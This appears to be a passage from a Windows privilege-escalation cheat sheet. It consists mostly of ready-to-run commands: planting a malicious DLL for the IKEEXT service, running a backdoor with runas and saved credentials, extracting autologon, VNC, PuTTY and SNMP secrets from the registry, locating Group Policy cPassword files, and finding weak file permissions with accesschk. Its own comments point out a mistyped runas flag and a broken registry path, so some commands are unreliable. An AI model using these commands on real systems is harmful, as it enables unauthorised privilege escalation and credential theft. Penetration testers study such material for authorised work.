# Before acting, check the status of the IKEEXT service. In this case it is set to "AUTO_START", so it will launch on boot.
sc qc IKEEXT
copy evil.dll C:\Python27\wlbsctrl.dll

Stored credentials

cmdkey /list

# if saved creds exist, use runas to execute as that user (the flag is /savecred, as in the earlier runas example)
runas /savedcred /user:<USERNAME-OF-SAVED-CRED> C:\Temp\backdoor.exe

Get passwords from windows registry

# autologon creds
Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon' | select "Default*"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

reg query "HKCU\Software\ORL\WinVNC3\Password"

# SNMP Parameters (the key path is HKLM\SYSTEM\CurrentControlSet\Services\SNMP; the query below has a stray backslash in "Current\ControlSet")
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"

# Putty
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"

Search for password in registry

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

Files that may contain passwords

# SYSVOL policy files containing cPassword on a domain controller;
# general locations: %SYSTEMROOT%\SYSVOL\sysvol 
# \\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\
Services\Services.xml: Element-Specific Attributes
ScheduledTasks\ScheduledTasks.xml: Task Inner Element, TaskV2 Inner Element, ImmediateTaskV2 Inner Element
Printers\Printers.xml: SharedPrinter Element
Drives\Drives.xml: Element-Specific Attributes
DataSources\DataSources.xml: Element-Specific Attributes

Find all weak folder permissions per drive.

accesschk.exe -uwdqs Users c:\
accesschk.exe -uwdqs "Authenticated Users" c:\

Find all weak file permissions per drive.

accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*